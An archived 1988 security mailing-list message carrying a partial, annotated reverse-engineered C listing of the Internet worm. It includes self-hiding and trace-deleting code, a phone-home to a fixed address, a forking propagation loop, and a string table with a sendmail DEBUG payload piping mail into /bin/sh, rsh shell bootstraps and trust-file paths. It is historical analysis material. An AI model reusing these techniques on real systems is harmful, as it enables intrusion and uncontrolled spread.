ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #182 [[becker@trantor.harris-atd.com: C code for part of worm]] (1 message, 3941 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/182.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.
START OF DOCUMENT
From: Jean Marie Diaz <jdiaz%oracle%hplabs@hplabs.HP.COM>
To: phage
Date: Fri 17:11:57 04/11/1988 EST
Subject: [becker@trantor.harris-atd.com: C code for part of worm]
References:
[Thread Prev: 180]
[Thread Next: 187]
[Message Prev: 076]
[Message Next: 043]
------- Forwarded Message
Received: by ATHENA-PO-2.MIT.EDU (5.45/4.7) id AA07174; Fri, 4 Nov 88 12:15:37 EST
Received: by ATHENA.MIT.EDU (5.45/4.7) id AA14060; Fri, 4 Nov 88 12:15:58 EST
Received: by trantor.harris-atd.com (5.51/1.14)
id AA09158; Fri, 4 Nov 88 12:12:30 EST
Message-Id: <8811041712.AA09158@trantor.harris-atd.com>
Received: by disk.harris-atd.com (3.2/4.8) id AA01617; Fri, 4 Nov 88 12:11:58 EST
Date: Fri, 4 Nov 88 12:11:58 EST
From: Don Becker <becker@trantor.harris-atd.com>
To: sipb@athena.mit.edu
Subject: C code for part of worm
(I'm an old SIPB member who was almost hit by the worm. I thought
you might be interested.
Send mail for the up-to-the-minute version. I should be finished by this
evening.)
/*****************************************************************************\
* *
* File: worm.c *
* Author: Don Becker *
* Created: Thu Nov 3 17:16:10 1988 *
* Contents: Reverse engineered worm program that invaded ATD on 11/3/88 *
* *
******************************************************************************/
#include <stdio.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int nobjects = 0;   /* objects registered by loadobject(); main() exits if none */
int pleasequit;     /* when set (and nextw > 0) the loop in mainplus610() exits */
int nextw;
int nifs;           /* number of ifs[] entries filled in by if_init() */
char *null_auth;    /* not referenced anywhere in this listing */
/*
 * Reconstructed string table.  In the binary these bytes live in the
 * 'environ' data area XOR-obscured with 0x81 and are decoded on demand by
 * XS() below; each envNN name records the byte offset into that area.
 * Here the literals are written out already decoded, so the comments at
 * the call sites ("sh", "-p", "l1.c", ...) give the effective value.  The
 * call sites also pass &envNN (a char **) where XS() expects the obscured
 * bytes themselves -- this listing is a reading aid, not something that
 * runs as written.
 * NOTE(review): a file-scope 'char environ[50]' may clash with the C
 * library's extern 'environ' on Unix; presumably a stand-in for the
 * obscured data area.
 */
char environ[50] = "";
char *sh = "sh";
char *env52 = "sh";                       /* 0x20034, <environ+52>: copied over argv[0] by main() */
char *env55 = "-p";                       /* option carrying the bootstrap shell's pid */
char *env58 = "l1.c";                     /* the object main() insists on having loaded */
char *env63 = "sh";                       /* unlinked by main() when started with -p */
char *env66 = "/tmp/.dump";               /* likewise unlinked */
char *env77 = "128.32.137.13";            /* destination of the single byte sent by XSplus152() */
char *env91 = "127.0.0.1";                /* not referenced in this listing */
char *env102 = "/usr/ucb/netstat -r -n";  /* 0x20066: command popen()ed by rt_init() */
char *env125 = "r";                       /* popen() mode */
char *env127 = "%s%s";                    /* sscanf() format applied to netstat output */
char *XS();                               /* string decoder; defined below */
/*
 * One per-interface record as laid out in the binary.  Field names are
 * the byte offsets the disassembly used, not recovered names.  Only two
 * are touched in this listing: netmaskfor() compares l16 against a
 * candidate address under a classful mask and returns l24, which suggests
 * l16 is the interface address and l24 its netmask.
 */
struct ifses {
    int l0;
    int l4;
    int l8;
    int l12;
    int l16;    /* matched against the target address in netmaskfor() */
    int l20;
    int l24;    /* returned as the mask by netmaskfor() */
    short l28;
};

struct ifses ifs[30];   /* capacity marked "Arbitrary" by the author; filled by if_init() */
/*
 * Entry point of the reverse-engineered worm.  Hides the process, loads
 * the object files named on the command line, removes its own traces when
 * started from the bootstrap shell ("-p <pid>"), enumerates the network
 * interfaces and then hands off to the endless loop in mainplus610().
 *
 * argv: optional "-p <pid>" (the pid of the shell that compiled and
 *       started this copy -- see the "./$P -p $$" line in the string
 *       table at the end of the file) followed by the object files to
 *       load.  One of them must be named "l1.c".
 * Exits with status 1 on any setup failure; otherwise never returns.
 *
 * NOTE(review): XS() expects the 0x81-obscured bytes; passing &envNN (a
 * char **) is an artifact of this reconstruction -- read the call-site
 * comments for the effective strings.  loadobject() and getobjectbyname()
 * are not part of this listing.  l1 and l5 are unused here.
 */
main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
    int i, l1, pid_arg, j, cur_arg, l5;
    long key; /* -28(fp) */
    struct rlimit rl;

    l1 = 0;
    /* Overwrite argv[0] so the process shows up as "sh" in ps. */
    strcpy(argv[0], XS(&env52)); /* "sh" */
    /* PRNG seeded with wall-clock time: every random() choice made later
     * (scratch file names, etc.) is predictable from the start time. */
    time(&key);
    srandom(key);
    /* Core-dump limit 0: a crash leaves no core file behind for analysts. */
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
        ;   /* result deliberately ignored */
    /* Writing to a peer that went away must not kill the process. */
    signal(SIGPIPE, SIG_IGN);

    pid_arg = 0;
    cur_arg = 1;
    /* "-p <pid>": started by the bootstrap shell whose pid this is. */
    if (argc > 2 &&
        strcmp(argv[cur_arg], XS(&env55)) == 0) { /* env55 == "-p" */
        pid_arg = atoi(argv[2]);
        cur_arg += 2;
    }
    /* Remaining arguments are object files; when started via -p each one
     * is deleted from disk as soon as it has been read in. */
    for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
        if (loadobject(argv[i]) == 0)
            exit(1);
        if (pid_arg)
            unlink(argv[i]);
    }
    /* Refuse to run without the bootstrap source object "l1.c". */
    if ((nobjects < 1) || (getobjectbyname(XS(&env58)) == 0)) /* "l1.c" */
        exit(1);
    if (pid_arg) {
        /* Drop every inherited descriptor, then remove the binary ("sh" is
         * what the bootstrap script compiles into unless a file of that
         * name already exists) and /tmp/.dump.  argv[0] has already been
         * overwritten with "sh", so the first two unlink()s coincide as
         * transcribed. */
        for(i = 0; i < 32; i++)
            close(i);
        unlink(argv[0]);
        unlink(XS(&env63)); /* "sh" */
        unlink(XS(&env66)); /* "/tmp/.dump" */
    }
    /* Wipe the argument strings so ps shows nothing beyond argv[0]. */
    for (i = 1; i < argc; i++)
        for (j = 0; argv[i][j]; j++)
            argv[i][j] = '\0';
    if (if_init() == 0)
        exit(1);
    if (pid_arg) { /* main+600 */
        /* Leave the bootstrap shell's process group if we are in it, then
         * SIGKILL that shell. */
        if (pid_arg == getpgrp(getpid()))
            setpgrp(getpid(), getpid());
        kill(pid_arg, 9);
    }
    mainplus610();
} /* main+610 */
/*
 * Propagation loop, split off from main() at <main+610>.
 *
 * Re-seeds the PRNG from the clock, runs one attack round plus a
 * cracksome() pass, sleeps 30, then loops forever: crack, fork (the
 * parent exits, so the pid changes every round), attack, sleep about two
 * minutes.  Because time0 is never reset, h_clean() runs on every round
 * once twelve hours have passed since start.  The loop ends only when
 * pleasequit is set and nextw is positive.
 *
 * hg(), hl(), ha(), hi(), checkother(), cracksome(), other_sleep() and
 * h_clean() are not in this listing; from the call pattern hg/hl/ha/hi
 * look like the per-host attack routines, but confirm against the rest
 * of the disassembly.  XS_152() presumably refers to XSplus152() below
 * (the name differs).
 */
static mainplus610()
{
    long key, time1, time0;

    time(&key);
    srandom(key);
    time0 = key;
    /* First round: ha() is only attempted if hg() and hl() both fail. */
    if (hg() == 0 && hl() == 0)
        ha();
    checkother();
    XS_152();
    cracksome();
    other_sleep(30);
    while (1) {
        cracksome();
        /* Parent exits, child carries on.  If fork() fails (-1) the
         * condition is false and the same process simply continues. */
        if (fork() > 0)
            exit(0);
        if (hg() == 0 && hi() == 0 && ha() == 0)
            hl();
        other_sleep(120);
        time(&time1);
        if (time1 - time0 >= 60*60*12)
            h_clean();
        if (pleasequit && nextw > 0)
            exit(0);
    }
}
/* Scratch arena that XS() hands decoded strings out of.  A result stays
 * valid only until later calls wrap trans_cnt back to the start. */
static int trans_cnt = 0;
static char trans_buf[NCARGS];

/*
 * Decode one 0x81-obscured string from the binary's string table.
 *
 * str1: NUL-terminated obscured bytes.
 * Returns a pointer into trans_buf holding the XOR-decoded copy with its
 * own terminator.  Results are packed back to back; when the next string
 * would not fit in the remaining tail the arena is reused from the
 * beginning, so a caller that needs a result for long must copy it.  The
 * transform is its own inverse, so the same routine also obscures
 * plaintext.
 * NOTE(review): a string of NCARGS or more bytes would run past the end
 * of trans_buf; every table entry in this listing is short.
 */
char *XS(str1) /* 0x23fc */
char *str1;
{
    char *out, *dst;
    char *src;
    int need;

    need = strlen(str1) + 1;          /* bytes including the terminator */
    if (need > NCARGS - trans_cnt)    /* no room at the tail: wrap around */
        trans_cnt = 0;
    out = &trans_buf[trans_cnt];
    trans_cnt += need;
    for (src = str1, dst = out; *src; src++, dst++)
        *dst = *src ^ 0x81;
    *dst = '\0';
    return out;
}
/*
 * The "phone home" routine at <XS+152>.  Guarded by a test on random()
 * that the author flags as not yet matching the binary's division
 * instruction, it opens a TCP socket and sendto()s a single byte of
 * uninitialised stack (msg) toward the address in env77, 128.32.137.13,
 * with the two bytes the author reads as 0x2c5d dropped into the port
 * field of the sockaddr.  No connect() is issued, so on a SOCK_STREAM
 * socket this sendto() is expected to fail; the result is discarded
 * either way and the socket is closed.  arg1 and arg2 are never used.
 */
static XSplus152(arg1, arg2) /* 0x2494 */
{
    int s;
    struct sockaddr soka;
    char msg;   /* never initialised: one byte of whatever is on the stack */

    if (7 != random()/((short)15)) /* This needs fixed. It does not*/
        return; /* produce the same div instn. */
    bzero(&soka, sizeof(soka));
    soka.sa_family = AF_INET;
    /* What is going on here??? */
    /* sa_data[0..1] is where sockaddr_in keeps sin_port.  The value of a
     * multi-character constant is implementation-defined; the author's
     * reading of the binary is 0x2c5d. */
    *((short *)soka.sa_data) = '],'; /* 0x2c5d */
    /* sa_data[2..5] is sin_addr. */
    *((int *)(&soka.sa_data[2])) =
        inet_addr(XS(&env77)); /* "128.32.137.13" */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    if (sendto(s, &msg, 1, 0, &soka, sizeof(soka)))
        ;   /* return value ignored */
    close(s);
}
/*
 * Interface enumeration (partially recovered).  Opens a socket, issues
 * request 0xc0086914 on it and is meant to fill ifs[]/nifs from the
 * result; in this listing the fill loop is still an empty stub, so on the
 * success path the function falls off the end with no return value (and
 * the socket s left open), while main() tests that value against 0.
 * Returns 0 on socket() or ioctl() failure.
 *
 * NOTE(review): 0xc0086914 decodes as a BSD _IOWR('i', 20, <8-byte arg>)
 * request -- the shape of SIOCGIFCONF with a struct ifconf {ifc_len,
 * ifc_buf}; the adjacent locals l1 = 384 and l0 = &l392 look like that
 * struct, with foo[396] as the buffer.  The "192.8.105.20 ???" note is
 * the author reading the constant as an IP address.  Confirm against the
 * target's <sys/ioctl.h>.  The loop bound derived from l1 reads like a
 * signed divide by 32 (the 4.3BSD struct ifreq size) but is written with
 * a left shift here -- possibly a transcription slip.
 */
if_init() /* 0x254c */
{
    int *l0, l1;
    char foo[396];
    int l408,l404,i;
    int s, l392;
    char foo1[60];

    nifs = 0;
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return 0; /* if_init+1042 */
    l0 = &l392;
    l1 = 384;
    if (ioctl(s, 0xc0086914, &l1) < 0) { /* 192.8.105.20 ??? */
        close(s);
        return 0; /* if_init+1042 */
    }
    l404 = (l1< 0 ? l1+31 : l1) << 5;
    for(i = 0; i < l404; i++) { /* if_init+144 */
        l408 = 0;
        if (l408 < nifs) {
            ;   /* body not yet recovered */
        }
    }
    /* No return value on this path; s is not closed either. */
}
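/*
 * Default (classful) netmask for an IPv4 address given as a 32-bit int in
 * host byte order.
 *
 * net_addr: the address.
 * Returns 0xFF000000 for class A (leading bit 0), 0xFFFF0000 for class B
 * (leading bits 10) and 0xFFFFFF00 for everything else (110, 111...).
 * The mask travels through an int return; callers use it as a bit mask.
 *
 * The listing as forwarded compared the top two bits against 0xC0000000,
 * which handed class B addresses the /24 mask and class C the /16 one;
 * the classful rule compares against 0x80000000, as below.
 */
int def_netmask(net_addr) /* 0x2962 */
int net_addr;
{
    if ((net_addr & 0x80000000) == 0)
        return 0xFF000000;
    if ((net_addr & 0xC0000000) == 0x80000000)
        return 0xFFFF0000;
    return 0xFFFFFF00;
}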
/*
 * Netmask to use for addr: the classful default, unless some entry in
 * ifs[] lies on the same classful network, in which case that entry's own
 * mask (field l24) is returned.  The comparison masks both sides with the
 * classful default, so one entry can claim every address on its class
 * network.  Relies on nifs and ifs[] filled in by if_init().
 */
int netmaskfor(addr) /* 0x29aa */
int addr;
{
    int classful, k;

    classful = def_netmask(addr);
    k = 0;
    while (k < nifs) {
        /* same network iff the two addresses agree on every mask bit */
        if (((addr ^ ifs[k].l16) & classful) == 0)
            return ifs[k].l24;
        k++;
    }
    return classful;
}
int ngateways;  /* gateways found by rt_init(); capped at 500 */

/*
 * Gateway discovery (partially recovered).  Runs "/usr/ucb/netstat -r -n"
 * through popen() -- i.e. via the shell -- and reads the routing table
 * with fgets() into a 64-byte buffer (a longer line arrives in pieces),
 * parsing each piece with "%s%s" and stopping once 500 gateways are
 * recorded.  Returns 0 if popen() fails, otherwise 1 after calling
 * rt_init_plus_544().
 *
 * NOTE(review): as transcribed, sscanf() is handed the ints l204 and l304
 * where "%s" needs writable buffers; the names are frame offsets, and the
 * binary presumably points at stack buffers there.  The per-line work
 * marked "other shit" and other_sleep() are not in this listing.
 */
rt_init() /* 0x2a26 */
{
    FILE *pipe;
    char input_buf[64];
    int l204, l304;

    ngateways = 0;
    pipe = popen(XS(&env102), XS(&env125)); /* "/usr/ucb/netstat -r -n", "r"*/
    if (pipe == 0)
        return 0;
    while (fgets(input_buf, sizeof(input_buf), pipe)) { /* to 518 */
        other_sleep(0);
        if (ngateways >= 500)
            break;
        sscanf(input_buf, XS(&env127), l204, l304); /* "%s%s" */
        /* other shit */
    } /* 518, back to 76 */
    pclose(pipe);
    rt_init_plus_544();
    return 1;
} /* 540 */
/* Continuation of rt_init() at <rt_init+544>; body not yet recovered. */
static rt_init_plus_544() /* 0x2c44 */
{
}
/* Routine at 0x2e1a; only its name has been recovered so far. */
getaddrs() /* 0x2e1a */
{
}
/*
 * Round-trips its argument through a static and returns it unchanged.
 * The caller in x3a20() feeds the result to inet_ntoa(), which takes a
 * struct in_addr by value; this int-returning form is the author's
 * approximation of that conversion (the call there also passes five
 * arguments, of which only the first is used).
 */
int a2in(a) /* 0x2f4a */
int a;
{
    static int local;

    local = a;
    return local;
}
/*
 * Remote bootstrap over an already-open shell (routine at 0x3a20; the
 * failure exits jump to <hi+2128>, so this code appears to sit inside
 * hi()).  arg2 is the descriptor commands are written to, arg1 the one
 * the remote shell's output appears to be read from by waithit_plus2412()
 * (marker string plus timeout), arg0 is the target handed on to
 * waithit().  The sequence, taken from the string comments:
 *   1. set PATH and cd /usr/tmp;
 *   2. "echo gorch49;sed '/int zz;/q' > x<rand>.c;echo gorch50" -- sed
 *      copies its input into the file until it sees the line "int zz;";
 *   3. once "gorch49" comes back, write the "l1.c" object (XOR-toggled in
 *      place around the write, presumably to keep it obscured in memory),
 *      then the "int zz;" terminator, and wait for "gorch50";
 *   4. "cc -o x<rand> x<rand>.c;./x<rand> %s %d %d;rm -f ...;echo DONE" --
 *      compile and run the bootstrap with an address and two numbers
 *      (presumably the values makemagic() produced; the argument list
 *      here is shorter than the format's conversions, so this part is
 *      still incomplete);
 *   5. on "DONE", hand over to waithit().
 * The scratch name is x<rand> with rand = random() % 0xFFFFFF, so it is
 * predictable from the PRNG seed (wall-clock time in main()).
 *
 * Returns 0 on any failure (closing l588 on the later ones), otherwise
 * whatever waithit() returns.  l516, l572, l576, l580..l592 and env201..
 * env387 are frame/table offsets not declared in this listing; makemagic(),
 * waithit*() and xorbuf() are defined elsewhere.
 */
x3a20(arg0, arg1, arg2)
{
    char *object;
    char local[40];
    char print_buf[512]; /* l568 */

    object = getobjectbyname(XS(&env201)); /* "l1.c" */
    if (object == NULL)
        return 0; /* <hi+2128> */
    if (makemagic(arg0, l592, l580, l584, l588) == 0)
        return 0;
    waithit_plus1594(arg2, XS(&env206)); /* "PATH=/bin:/usr/bin:/usr/ucb\n" */
    waithit_plus1594(arg2, XS(&env235)); /* "cd /usr/tmp\n" */
    l576 = random() % 0x00FFFFFF;
    sprintf(print_buf, XS(&env248), l576); /* "x%d.c" */
    sprintf(&l516, XS(&env254), print_buf);
    /* "echo gorch49;sed \'/int zz;/q\' > %s;echo gorch50\n" */
    waithit_plus1594(arg2, &l516);
    waithit_plus2412(arg1, XS(&env303), 10); /* "gorch49" */
    /* object[4] serves as the length and object[8] as the data pointer
     * below: field offsets into the loaded object, not character indices. */
    xorbuf(object[8], object[4]);
    l572 = write(arg2, object[8], object[4]);
    xorbuf(object[8], object[4]);
    if (object[4] != l572) {   /* short write: give up on this target */
        close(l588);
        return 0; /* to <hi+2128> */
    }
    waithit_plus1594(arg2, XS(&env311)); /* "int zz;\n\n" */
    waithit_plus2412(arg1, XS(&env321), 30); /* "gorch50" */
    sprintf(&l516, XS(&env329), l576, l576, l576,
        inet_ntoa(a2in(l592, l580, l584, l576, l576)));
    /* "cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE\n" */
    waithit_plus1594(arg2, &l516);
    if (waithit_plus2412(arg1, XS(&env387), 100) == 0) { /* "DONE" */
        close(l588);
        return 0; /* <hi+2128> */
    }
    return waithit(arg0, l592, l580, l584, l588);
}
/* Stub at <waithit+12xx>.  Per the author it performs the 'cat' -- see
 * the "cat > %s <<'EOF'" entry in the string table.  Body not recovered. */
waithit_plus12xx()
{} /* Does the 'cat' */
/*
 * SIGALRM handler that does nothing.  mail() installs it before arming a
 * ten-second alarm() around connect(); the intent is that an expired
 * alarm interrupts the blocking connect() (which mail() then treats as a
 * failure) instead of terminating the process, the default SIGALRM
 * action.  The three parameters are the 4.3BSD handler signature.
 */
justreturn(sig, code, scp) /* 0x4872 */
int sig, code;
struct sigcontext *scp;
{ }
/*
 * Target descriptor handed to mail() by value and on to makemagic().
 * Field names are byte offsets from the disassembly.  Only o48[] is
 * touched in this listing: up to six raw IPv4 addresses (s_addr values,
 * 0 meaning "no entry") that mail() tries to reach on the SMTP port, in
 * order, until one connect() succeeds.
 */
struct mag {
    short o0;
    short o2;
    int l4;
    int l8;
    int l12;
    int l16;
    int l20;
    int l24;
    int o28;
    int o32;
    int o36;
    int o40;
    int o44;
    int o48[6];     /* candidate SMTP peers, tried in order by mail() */
};
/*
 * SMTP attack (routine at 0x4d3c, which the author places at
 * <permute+162>).  The body recovered here stops at <permute+1058>: the
 * goto target lp996 and the local l548 are undeclared.
 *
 * arg1 is a struct mag passed by value; its o48[] slots hold up to six
 * candidate addresses.  After makemagic() fills in the callback values, a
 * do-nothing SIGALRM handler is installed and each address is tried with
 * a ten-second alarm around connect() to IPPORT_SMTP; the first success
 * breaks out with the socket in s.  The dialogue that follows is in the
 * string table at the end of the file: "debug", "mail from:</dev/null>",
 * "rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">", "data", "quit" --
 * sendmail's DEBUG command is used so the recipient becomes a pipe into
 * /bin/sh, with sed stripping the message headers up to the first blank
 * line so the body runs as a script.
 *
 * NOTE(review): as transcribed the post-loop test 'if (i < 6) return 0'
 * returns after a *successful* connect (break leaves i < 6) and carries
 * on with a closed -- or, if every slot was 0, never created -- s when
 * all six failed; the sense looks inverted, confirm against the binary.
 * No htons() is visible on sin_port; on a big-endian host that cannot
 * be told from the code.  The handler saved in l552 is not restored in
 * the recovered part.
 */
mail(arg0, arg1) /* 4d3c <permute+162>*/
struct mag arg1;
{
    int i, l8, l12, l16, s;
    struct sockaddr_in sin;
    char local[544];
    int l552, l556, l560, l564, l568;

    if (makemagic(arg1, &l556, &l560, &l564, &l568) == 0)
        return 0; /* <permute+1054> */
    l552 = signal(SIGALRM, &justreturn);    /* previous handler kept in l552 */
    for( i = 0; i < 6; i++) { /* to 430 */
        if (arg1.o48[i] == NULL)
            continue; /* to 422 */
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
            continue; /* to 422 */
        bzero(&sin, sizeof(sin)); /* 16 */
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = arg1.o48[i];
        sin.sin_port = IPPORT_SMTP;
        /* Ten-second connect timeout via the do-nothing SIGALRM handler. */
        alarm(10);
        if (connect(s, &sin, sizeof(sin)) < 0) {
            alarm(0);
            close(s);
            continue; /* to 422 */
        }
        alarm(0);
        break;
    }
    if (i < 6)
        return 0; /* 1054 */
    if (permute_plus1058( s, &l548) == 0)
        goto lp996;
}
/*
 * Dump of the decoded string table in the order it sits in the binary
 * (the envNN offsets above index into it).  As written this is not valid
 * C -- the literal runs across lines without continuations -- it is the
 * author's listing of what XS() produces.  Entries worth knowing about:
 *   - the rsh bootstrap: "cc -o x%d x%d.c;./x%d %s %d %d;rm -f ...;echo
 *     DONE" and the "cat > %s <<'EOF'" variant, with /usr/ucb/rsh,
 *     /usr/bin/rsh, /bin/rsh and "exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'";
 *   - the bootstrap shell script ("rm -f sh" ... "cc -o $P %s" ...
 *     "./$P -p $$" ... "rm -f $P"): compile the dropped source and start
 *     the binary with the shell's own pid, which main() then SIGKILLs;
 *   - the sendmail dialogue "debug" / "mail from:</dev/null>" /
 *     "rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">" / "data" / "quit"
 *     used by mail();
 *   - trust-file paths and the scanf patterns that go with them:
 *     /etc/hosts.equiv, /.rhosts, %.200s/.rhosts, %.200s/.forward,
 *     "%[^ ,]" and "%*s %[^ ,]s";
 *   - /usr/dict/words, presumably the word list behind cracksome().
 */
char *text =
"default
0.0.0.0
127.0.0.1
exec /bin/sh
l1.c
PATH=/bin:/usr/bin:/usr/ucb
cd /usr/tmp
x%d.c
echo gorch49;sed '/int zz;/q' > %s;echo gorch50
gorch49
int zz;
gorch50
cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
DONE
x%d,%s
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then
P=x%d
else
P=sh
cc -o $P %s
./$P -p $$
rm -f $P
rm -f %s $P
l1.c
cd /usr/tmp
x%d.c
cat > %s <<'EOF'
cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
/usr/ucb/rsh
/usr/bin/rsh
/bin/rsh
/bin/echo %s
debug
mail from:</dev/null>
rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
data
quit
quit
exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
/bin/sh
/bin/sh
127.0.0.1
127.0.0.1
/etc/hosts.equiv
%.100s
/.rhosts
%.200s/.forward
%.20s%.20s
%[^ ,]
%*s %[^ ,]s
%.200s/.forward
%.200s/.rhosts
%s%s
/usr/dict/words";
------- End of Forwarded Message
------- End Forwarded Message
END OF DOCUMENT